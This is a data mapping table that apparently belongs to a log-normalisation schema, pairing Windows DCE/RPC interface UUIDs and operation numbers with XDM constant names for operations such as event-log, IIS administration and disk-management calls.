00020401-0000-0000-c000-000000000046:9 XDM_CONST.DCERPC_OPERATION_GET_IMPL_TYPE_FLAGS

00020401-0000-0000-c000-000000000046:12 XDM_CONST.DCERPC_OPERATION_GET_DOCUMENTATION

00020401-0000-0000-c000-000000000046:13 XDM_CONST.DCERPC_OPERATION_GET_DLL_ENTRY

00020401-0000-0000-c000-000000000046:14 XDM_CONST.DCERPC_OPERATION_GET_REF_TYPE_INFO

00020401-0000-0000-c000-000000000046:16 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE

00020401-0000-0000-c000-000000000046:17 XDM_CONST.DCERPC_OPERATION_GET_MOPS

00020401-0000-0000-c000-000000000046:18 XDM_CONST.DCERPC_OPERATION_GET_CONTAINING_TYPE_LIB

d2d79df7-3400-11d0-b40b-00aa005ff586:0 XDM_CONST.DCERPC_OPERATION_OBJECTS_CHANGED

3a410f21-553f-11d1-8e5e-00a0c92c9d5d:3 XDM_CONST.DCERPC_OPERATION_CREATE_REMOTE_OBJECT

027947e1-d731-11ce-a357-000000000001:3 XDM_CONST.DCERPC_OPERATION_RESET

027947e1-d731-11ce-a357-000000000001:4 XDM_CONST.DCERPC_OPERATION_NEXT

027947e1-d731-11ce-a357-000000000001:5 XDM_CONST.DCERPC_OPERATION_NEXT_ASYNC

027947e1-d731-11ce-a357-000000000001:6 XDM_CONST.DCERPC_OPERATION_CLONE

027947e1-d731-11ce-a357-000000000001:7 XDM_CONST.DCERPC_OPERATION_SKIP

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:0 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_REMOTE_SUBSCRIPTION

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:1 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_NEXT_ASYNC

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:2 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_NEXT

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:3 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REMOTE_SUBSCRIPTION_WAIT_ASYNC

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:4 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_CONTROLLABLE_OPERATION

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:5 XDM_CONST.DCERPC_OPERATION_EVT_RPC_REGISTER_LOG_QUERY

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:6 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CLEAR_LOG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:7 XDM_CONST.DCERPC_OPERATION_EVT_RPC_EXPORT_LOG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:8 XDM_CONST.DCERPC_OPERATION_EVT_RPC_LOCALIZE_EXPORT_LOG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:9 XDM_CONST.DCERPC_OPERATION_EVT_RPC_MESSAGE_RENDER

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:10 XDM_CONST.DCERPC_OPERATION_EVT_RPC_MESSAGE_RENDER_DEFAULT

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:11 XDM_CONST.DCERPC_OPERATION_EVT_RPC_QUERY_NEXT

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:12 XDM_CONST.DCERPC_OPERATION_EVT_RPC_QUERY_SEEK
 Original Mapped Description

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:13 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CLOSE

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:14 XDM_CONST.DCERPC_OPERATION_EVT_RPC_CANCEL

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:15 XDM_CONST.DCERPC_OPERATION_EVT_RPC_ASSERT_CONFIG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:16 XDM_CONST.DCERPC_OPERATION_EVT_RPC_RETRACT_CONFIG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:17 XDM_CONST.DCERPC_OPERATION_EVT_RPC_OPEN_LOG_HANDLE

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:18 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_LOG_FILE_INFO

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:19 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CHANNEL_LIST

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:20 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CHANNEL_CONFIG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:21 XDM_CONST.DCERPC_OPERATION_EVT_RPC_PUT_CHANNEL_CONFIG

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:22 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_LIST

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:23 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_LIST_FOR_CHANNEL

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:24 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_METADATA

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:25 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_PUBLISHER_RESOURCE_METADATA

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:26 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_EVENT_METADATA_ENUM

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:27 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_NEXT_EVENT_METADATA

f6beaff7-1e19-4fbb-9f8f-b89e2018337c:28 XDM_CONST.DCERPC_OPERATION_EVT_RPC_GET_CLASSIC_LOG_DISPLAY_NAME

7c4e1804-e342-483d-a43e-a850cfcc8d18:3 XDM_CONST.DCERPC_OPERATION_CREATE_APPLICATION

7c4e1804-e342-483d-a43e-a850cfcc8d18:4 XDM_CONST.DCERPC_OPERATION_DELETE_APPLICATION

7c4e1804-e342-483d-a43e-a850cfcc8d18:5 XDM_CONST.DCERPC_OPERATION_CREATE_APPLICATION_POOL

7c4e1804-e342-483d-a43e-a850cfcc8d18:6 XDM_CONST.DCERPC_OPERATION_DELETE_APPLICATION_POOL

7c4e1804-e342-483d-a43e-a850cfcc8d18:7 XDM_CONST.DCERPC_OPERATION_ENUMERATE_APPLICATIONS_IN_POOL

7c4e1804-e342-483d-a43e-a850cfcc8d18:8 XDM_CONST.DCERPC_OPERATION_RECYCLE_APPLICATION_POOL

7c4e1804-e342-483d-a43e-a850cfcc8d18:9 XDM_CONST.DCERPC_OPERATION_GET_PROCESS_MODE

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:10 XDM_CONST.DCERPC_OPERATION_INSTANCE_NAME

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:12 XDM_CONST.DCERPC_OPERATION_IS_INSTALL_REMOTE

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:14 XDM_CONST.DCERPC_OPERATION_IS_EXPORTABLE_REMOTE

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:16 XDM_CONST.DCERPC_OPERATION_GET_CERT_INFO_REMOTE

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:22 XDM_CONST.DCERPC_OPERATION_IMPORT_FROM_BLOB

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:23 XDM_CONST.DCERPC_OPERATION_IMPORT_FROM_BLOB_GET_HASH

bd0c73bc-805b-4043-9c30-9a28d64dd7d2:25 XDM_CONST.DCERPC_OPERATION_EXPORT_TO_BLOB

e8fb8620-588f-11d2-9d61-00c04f79c5fe:7 XDM_CONST.DCERPC_OPERATION_STOP

e8fb8620-588f-11d2-9d61-00c04f79c5fe:8 XDM_CONST.DCERPC_OPERATION_START

e8fb8620-588f-11d2-9d61-00c04f79c5fe:9 XDM_CONST.DCERPC_OPERATION_REBOOT

e8fb8620-588f-11d2-9d61-00c04f79c5fe:10 XDM_CONST.DCERPC_OPERATION_STATUS

e8fb8620-588f-11d2-9d61-00c04f79c5fe:11 XDM_CONST.DCERPC_OPERATION_KILL

c3fcc19e-a970-11d2-8b5a-00a0c9b7c9c4:3 XDM_CONST.DCERPC_OPERATION_GET_SERIALIZED_BUFFER

c3fcc19e-a970-11d2-8b5a-00a0c9b7c9c4:4 XDM_CONST.DCERPC_OPERATION_GET_OBJECT_IDENTIFY

034634fd-ba3f-11d1-856a-00a0c944138c:7 XDM_CONST.DCERPC_OPERATION_GET_TELNET_SESSIONS

034634fd-ba3f-11d1-856a-00a0c944138c:8 XDM_CONST.DCERPC_OPERATION_TERMINATE_SESSION

034634fd-ba3f-11d1-856a-00a0c944138c:9 XDM_CONST.DCERPC_OPERATION_SEND_MSG_TO_A_SESSION

8298d101-f992-43b7-8eca-5052d885b995:34 XDM_CONST.DCERPC_OPERATION_BACKUP_WITH_PASSWRD
 Original Mapped Description

8298d101-f992-43b7-8eca-5052d885b995:35 XDM_CONST.DCERPC_OPERATION_RESTORE_WITH_PASSWRD

8298d101-f992-43b7-8eca-5052d885b995:36 XDM_CONST.DCERPC_OPERATION_EXPORT

8298d101-f992-43b7-8eca-5052d885b995:37 XDM_CONST.DCERPC_OPERATION_IMPORT

8298d101-f992-43b7-8eca-5052d885b995:38 XDM_CONST.DCERPC_OPERATION_RESTORE_HISTORY

8298d101-f992-43b7-8eca-5052d885b995:39 XDM_CONST.DCERPC_OPERATION_ENUM_HISTORY

f612954d-3b0b-4c56-9563-227b7be624b4:40 XDM_CONST.DCERPC_OPERATION_GET_CHILD_PATHS

70b51430-b6ca-11d0-b9b9-00a0c922e750:3 XDM_CONST.DCERPC_OPERATION_ADD_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:4 XDM_CONST.DCERPC_OPERATION_DELETE_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:5 XDM_CONST.DCERPC_OPERATION_DELETE_CHILD_K_EYS

70b51430-b6ca-11d0-b9b9-00a0c922e750:6 XDM_CONST.DCERPC_OPERATION_ENUM_KEYS

70b51430-b6ca-11d0-b9b9-00a0c922e750:7 XDM_CONST.DCERPC_OPERATION_COPY_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:8 XDM_CONST.DCERPC_OPERATION_RENAME_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:9 XDM_CONST.DCERPC_OPERATION_R_SET_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:10 XDM_CONST.DCERPC_OPERATION_R_GET_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:11 XDM_CONST.DCERPC_OPERATION_DELETE_DATE

70b51430-b6ca-11d0-b9b9-00a0c922e750:12 XDM_CONST.DCERPC_OPERATION_R_ENUM_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:13 XDM_CONST.DCERPC_OPERATION_R_GET_ALL_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:14 XDM_CONST.DCERPC_OPERATION_DELETE_ALL_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:15 XDM_CONST.DCERPC_OPERATION_COPY_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:16 XDM_CONST.DCERPC_OPERATION_GET_DATA_PATHS

70b51430-b6ca-11d0-b9b9-00a0c922e750:17 XDM_CONST.DCERPC_OPERATION_OPEN_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:18 XDM_CONST.DCERPC_OPERATION_CLOSE_KEY

70b51430-b6ca-11d0-b9b9-00a0c922e750:19 XDM_CONST.DCERPC_OPERATION_CHANGE_PERMISSIONS

70b51430-b6ca-11d0-b9b9-00a0c922e750:20 XDM_CONST.DCERPC_OPERATION_SAVE_DATA

70b51430-b6ca-11d0-b9b9-00a0c922e750:21 XDM_CONST.DCERPC_OPERATION_GET_HANDLE_INFO

70b51430-b6ca-11d0-b9b9-00a0c922e750:22 XDM_CONST.DCERPC_OPERATION_GET_SYSTEM_CHANGE_NUMBER

70b51430-b6ca-11d0-b9b9-00a0c922e750:23 XDM_CONST.DCERPC_OPERATION_GET_DATA_SET_NUMBER

70b51430-b6ca-11d0-b9b9-00a0c922e750:24 XDM_CONST.DCERPC_OPERATION_SET_LAST_CHANGE_TIME

70b51430-b6ca-11d0-b9b9-00a0c922e750:25 XDM_CONST.DCERPC_OPERATION_GET_LAST_CHANGE_TIME

70b51430-b6ca-11d0-b9b9-00a0c922e750:26 XDM_CONST.DCERPC_OPERATION_R_KEY_EXCHANGE_PHASE1

70b51430-b6ca-11d0-b9b9-00a0c922e750:27 XDM_CONST.DCERPC_OPERATION_R_KEY_EXCHANGE_PHASE2

70b51430-b6ca-11d0-b9b9-00a0c922e750:28 XDM_CONST.DCERPC_OPERATION_BACKUP

70b51430-b6ca-11d0-b9b9-00a0c922e750:29 XDM_CONST.DCERPC_OPERATION_RESTORE

70b51430-b6ca-11d0-b9b9-00a0c922e750:30 XDM_CONST.DCERPC_OPERATION_ENUM_BACKUPS

70b51430-b6ca-11d0-b9b9-00a0c922e750:31 XDM_CONST.DCERPC_OPERATION_DELETE_BACKUP

70b51430-b6ca-11d0-b9b9-00a0c922e750:32 XDM_CONST.DCERPC_OPERATION_UNMARSHAL_INTERFACE

70b51430-b6ca-11d0-b9b9-00a0c922e750:33 XDM_CONST.DCERPC_OPERATION_R_GET_SERVER_GUID

82ad4280-036b-11cf-972c-00aa006887b0:0 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_VERSION

82ad4280-036b-11cf-972c-00aa006887b0:1 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_ADMIN_INFORMATION

82ad4280-036b-11cf-972c-00aa006887b0:2 XDM_CONST.DCERPC_OPERATION_R_INSET_INFO_GET_SITES

82ad4280-036b-11cf-972c-00aa006887b0:3 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_SET_ADMIN_INFORMATION
 Original Mapped Description

82ad4280-036b-11cf-972c-00aa006887b0:4 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_GLOBAL_ADMIN_INFORMATION

82ad4280-036b-11cf-972c-00aa006887b0:5 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_SET_GLOBAL_ADMIN_INFORMATION

82ad4280-036b-11cf-972c-00aa006887b0:6 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_QUERY_STATISTICS

82ad4280-036b-11cf-972c-00aa006887b0:7 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_CLEAR_STATISTICS

82ad4280-036b-11cf-972c-00aa006887b0:8 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_FLUSH_MEMORY_CACHE

82ad4280-036b-11cf-972c-00aa006887b0:9 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_SERVER_CAPABILITIES

82ad4280-036b-11cf-972c-00aa006887b0:10 XDM_CONST.DCERPC_OPERATION_RW3_QUERY_STATISTICS2

82ad4280-036b-11cf-972c-00aa006887b0:11 XDM_CONST.DCERPC_OPERATION_RW3_CLEAR_STATISTICS2

82ad4280-036b-11cf-972c-00aa006887b0:12 XDM_CONST.DCERPC_OPERATION_R_FTP_QUERY_STATISTICS2

82ad4280-036b-11cf-972c-00aa006887b0:13 XDM_CONST.DCERPC_OPERATION_R_FTP_CLEAR_STATISTICS2

82ad4280-036b-11cf-972c-00aa006887b0:14 XDM_CONST.DCERPC_OPERATION_RIISD_ENUMERATE_USERS

82ad4280-036b-11cf-972c-00aa006887b0:15 XDM_CONST.DCERPC_OPERATION_RIIS_DISCONNECTED_USER

6619a740-8154-43be-a186-0319578e02db:7 XDM_CONST.DCERPC_OPERATION_REMOTE_DISPATCH_AUTO_DONE

6619a740-8154-43be-a186-0319578e02db:8 XDM_CONST.DCERPC_OPERATION_REMOTE_DISPATCH_NOT_AUTO_DONE

00000131-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE

00000131-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REM_ADD_REF

00000131-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_REM_RELEASE

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:7 XDM_CONST.DCERPC_OPERATION_RETRIEVE_EVENT_LIST

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:8 XDM_CONST.DCERPC_OPERATION_GET_SYSTEM_AFFINITY

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:9 XDM_CONST.DCERPC_OPERATION_IMPORT_XML_FILES

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:10 XDM_CONST.DCERPC_OPERATION_EXPORT_XML_FILES

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:11 XDM_CONST.DCERPC_OPERATION_RESTORE_XML_FILES

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:12 XDM_CONST.DCERPC_OPERATION_GET_DEPENDENCIES

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:13 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_LIST

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:14 XDM_CONST.DCERPC_OPERATION_GETLL_S_APP_POOL_NAMES

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:15 XDM_CONST.DCERPC_OPERATION_GET_SERVER_NAME

c5cebee2-9df5-4cdd-a08c-c2471bc144b4:16 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_MEMORY

2a3eb639-d134-422d-90d8-aaa1b5216202:7 XDM_CONST.DCERPC_OPERATION_EXPORT_OBJECTS

2a3eb639-d134-422d-90d8-aaa1b5216202:8 XDM_CONST.DCERPC_OPERATION_GET_IMPORT_CONFLICTS

2a3eb639-d134-422d-90d8-aaa1b5216202:9 XDM_CONST.DCERPC_OPERATION_IMPORT_XML

2a3eb639-d134-422d-90d8-aaa1b5216202:10 XDM_CONST.DCERPC_OPERATION_EXPORT_XML

b9785960-524f-11df-8b6d-83dcded72085:0 XDM_CONST.DCERPC_OPERATION_GET_KEY

e65e8028-83e8-491b-9af7-aaf6bd51a0ce:3 XDM_CONST.DCERPC_OPERATION_GET_REPORT

e65e8028-83e8-491b-9af7-aaf6bd51a0ce:4 XDM_CONST.DCERPC_OPERATION_GET_COMPRESSED_REPORT

e65e8028-83e8-491b-9af7-aaf6bd51a0ce:5 XDM_CONST.DCERPC_OPERATION_GET_RAW_REPORT_EX

e65e8028-83e8-491b-9af7-aaf6bd51a0ce:6 XDM_CONST.DCERPC_OPERATION_GET_REFERENCE_VERSION_VECTORS

e65e8028-83e8-491b-9af7-aaf6bd51a0ce:8 XDM_CONST.DCERPC_OPERATION_GET_REFERENCE_BACKLOG_COUNTS

20d15747-6c48-4254-a358-65039fd8c63c:9 XDM_CONST.DCERPC_OPERATION_GET_REPORT

20d15747-6c48-4254-a358-65039fd8c63c:16 XDM_CONST.DCERPC_OPERATION_GET_COMPRESSED_REPORT

8165b19e-8d3a-4d0b-80c8-97de310db583:3 XDM_CONST.DCERPC_OPERATION_GET_COMPONENT_INFO

112b1dff-d9dc-41f7-869f-d67fee7cb591:3 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD
 Original Mapped Description

112b1dff-d9dc-41f7-869f-d67fee7cb591:4 XDM_CONST.DCERPC_OPERATION_DESTROY_VIRTUAL_SMART_CARD

fdf8a2b9-02de-47f4-bc26-aa85ab5e5267:5 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD_WITH_PIN_POLICY

3c745a97-f375-4150-be17-5950f694c699:6 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD_WITH_ATTESTATION

1a1bb35f-abb8-451c-a1ae-33d98f1bef4a:3 XDM_CONST.DCERPC_OPERATION_REPORT_PROGRESS

1a1bb35f-abb8-451c-a1ae-33d98f1bef4a:4 XDM_CONST.DCERPC_OPERATION_REPORT_ERROR

d2d79df5-3400-11d0-b40b-00aa005ff586:3 XDM_CONST.DCERPC_OPERATION_ENUM_DISKS_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:4 XDM_CONST.DCERPC_OPERATION_ENUM_DISK_REGIONS_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:5 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:6 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGN_AND_FORMAT

d2d79df5-3400-11d0-b40b-00aa005ff586:7 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGNAND_FORMAT_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:8 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:9 XDM_CONST.DCERPC_OPERATION_WRITE_SIGNATURE

d2d79df5-3400-11d0-b40b-00aa005ff586:10 XDM_CONST.DCERPC_OPERATION_MARK_ACTIVE_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:11 XDM_CONST.DCERPC_OPERATION_EJECT

d2d79df5-3400-11d0-b40b-00aa005ff586:13 XDM_CONST.DCERPC_OPERATION_FT_ENUM_VOLUMES

d2d79df5-3400-11d0-b40b-00aa005ff586:14 XDM_CONST.DCERPC_OPERATION_FT_ENUM_LOGICAL_DISK_MEMBERS

d2d79df5-3400-11d0-b40b-00aa005ff586:15 XDM_CONST.DCERPC_OPERATION_FT_DELETE_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:16 XDM_CONST.DCERPC_OPERATION_FT_BREAK_MIRROR

d2d79df5-3400-11d0-b40b-00aa005ff586:17 XDM_CONST.DCERPC_OPERATION_FT_RESYNC_MIRROR

d2d79df5-3400-11d0-b40b-00aa005ff586:18 XDM_CONST.DCERPC_OPERATION_FT_REGENERATE_PARITY_STRIPE

d2d79df5-3400-11d0-b40b-00aa005ff586:19 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_MIRROR_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:20 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_PARITY_STRIPE_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:21 XDM_CONST.DCERPC_OPERATION_ENUM_DRIVE_LETTERS

d2d79df5-3400-11d0-b40b-00aa005ff586:22 XDM_CONST.DCERPC_OPERATION_ASSIGN_DRIVE_LETTER

d2d79df5-3400-11d0-b40b-00aa005ff586:23 XDM_CONST.DCERPC_OPERATION_FREE_DRIVE_LETTER

d2d79df5-3400-11d0-b40b-00aa005ff586:24 XDM_CONST.DCERPC_OPERATION_ENUM_LOCAL_FILE_SYSTEMS

d2d79df5-3400-11d0-b40b-00aa005ff586:25 XDM_CONST.DCERPC_OPERATION_GET_INSTALLED_FILE_SYSTEMS

d2d79df5-3400-11d0-b40b-00aa005ff586:26 XDM_CONST.DCERPC_OPERATION_FORMAT

d2d79df5-3400-11d0-b40b-00aa005ff586:28 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUMES

d2d79df5-3400-11d0-b40b-00aa005ff586:29 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUME_MEMBERS

d2d79df5-3400-11d0-b40b-00aa005ff586:30 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:31 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT

d2d79df5-3400-11d0-b40b-00aa005ff586:32 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:33 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_MOUNT_NAME

d2d79df5-3400-11d0-b40b-00aa005ff586:34 XDM_CONST.DCERPC_OPERATION_GROW_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:35 XDM_CONST.DCERPC_OPERATION_DELETE_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:36 XDM_CONST.DCERPC_OPERATION_ADD_MIRROR

d2d79df5-3400-11d0-b40b-00aa005ff586:37 XDM_CONST.DCERPC_OPERATION_REMOVE_MIRROR

d2d79df5-3400-11d0-b40b-00aa005ff586:38 XDM_CONST.DCERPC_OPERATION_SPLIT_MIRROR

d2d79df5-3400-11d0-b40b-00aa005ff586:39 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:40 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE_DISK
 Original Mapped Description

d2d79df5-3400-11d0-b40b-00aa005ff586:41 XDM_CONST.DCERPC_OPERATION_RE_CONNECT_DISK

d2d79df5-3400-11d0-b40b-00aa005ff586:43 XDM_CONST.DCERPC_OPERATION_IMPORT_DISK_GROUP

d2d79df5-3400-11d0-b40b-00aa005ff586:44 XDM_CONST.DCERPC_OPERATION_DISK_MERGE_QUERY

d2d79df5-3400-11d0-b40b-00aa005ff586:45 XDM_CONST.DCERPC_OPERATION_DISK_MERGE

d2d79df5-3400-11d0-b40b-00aa005ff586:47 XDM_CONST.DCERPC_OPERATION_RE_ATTACH_DISK

d2d79df5-3400-11d0-b40b-00aa005ff586:51 XDM_CONST.DCERPC_OPERATION_REPLACE_RAID5_COLUMN

d2d79df5-3400-11d0-b40b-00aa005ff586:52 XDM_CONST.DCERPC_OPERATION_RESTART_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:53 XDM_CONST.DCERPC_OPERATION_GET_ENCAPSULATE_DISK_INFO_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:54 XDM_CONST.DCERPC_OPERATION_ENCAPSULATE_DISK_EX

d2d79df5-3400-11d0-b40b-00aa005ff586:55 XDM_CONST.DCERPC_OPERATION_QUERY_CHANGE_PARTITION_NUMBERS

d2d79df5-3400-11d0-b40b-00aa005ff586:56 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION_NUMBER_INFO_FROM_REGISTRY

d2d79df5-3400-11d0-b40b-00aa005ff586:57 XDM_CONST.DCERPC_OPERATION_SET_DONT_SHOW

d2d79df5-3400-11d0-b40b-00aa005ff586:58 XDM_CONST.DCERPC_OPERATION_GET_DONT_SHOW

d2d79df5-3400-11d0-b40b-00aa005ff586:67 XDM_CONST.DCERPC_OPERATION_ENUM_TASKS

d2d79df5-3400-11d0-b40b-00aa005ff586:68 XDM_CONST.DCERPC_OPERATION_GET_TASK_DETAIL

d2d79df5-3400-11d0-b40b-00aa005ff586:69 XDM_CONST.DCERPC_OPERATION_ABORT_TASK

d2d79df5-3400-11d0-b40b-00aa005ff586:70 XDM_CONST.DCERPC_OPERATION_HR_GET_ERROR_DATA

d2d79df5-3400-11d0-b40b-00aa005ff586:71 XDM_CONST.DCERPC_OPERATION_INITIALIZE

d2d79df5-3400-11d0-b40b-00aa005ff586:72 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE

d2d79df5-3400-11d0-b40b-00aa005ff586:73 XDM_CONST.DCERPC_OPERATION_REFRESH

d2d79df5-3400-11d0-b40b-00aa005ff586:74 XDM_CONST.DCERPC_OPERATION_RESCAN_DISKS

d2d79df5-3400-11d0-b40b-00aa005ff586:75 XDM_CONST.DCERPC_OPERATION_REFRESH_FILE_SYS

d2d79df5-3400-11d0-b40b-00aa005ff586:76 XDM_CONST.DCERPC_OPERATION_SECURE_SYSTEM_PARTITION

d2d79df5-3400-11d0-b40b-00aa005ff586:77 XDM_CONST.DCERPC_OPERATION_SHUT_DOWN_SYSTEM

d2d79df5-3400-11d0-b40b-00aa005ff586:78 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH

d2d79df5-3400-11d0-b40b-00aa005ff586:79 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH_FOR_VOLUME

d2d79df5-3400-11d0-b40b-00aa005ff586:80 XDM_CONST.DCERPC_OPERATION_ADD_ACCESS_PATH

d2d79df5-3400-11d0-b40b-00aa005ff586:81 XDM_CONST.DCERPC_OPERATION_DELETE_ACCESS_PATH

4bdafc52-fe6a-11d2-93f8-00105a11164a:3 XDM_CONST.DCERPC_OPERATION_GET_MAX_ADJUSTED_FREE_SPACE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:3 XDM_CONST.DCERPC_OPERATION_ENUM_DISKS_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:4 XDM_CONST.DCERPC_OPERATION_ENUM_DISK_REGIONS_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:5 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:6 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGN_AND_FORMAT

135698d2-3a37-4d26-99df-e2bb6ae3ac61:7 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGNAND_FORMAT_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:8 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:9 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_STYLE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:10 XDM_CONST.DCERPC_OPERATION_MARK_ACTIVE_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:11 XDM_CONST.DCERPC_OPERATION_EJECT

135698d2-3a37-4d26-99df-e2bb6ae3ac61:13 XDM_CONST.DCERPC_OPERATION_FT_ENUM_VOLUMES

135698d2-3a37-4d26-99df-e2bb6ae3ac61:14 XDM_CONST.DCERPC_OPERATION_FT_ENUM_LOGICAL_DISK_MEMBERS

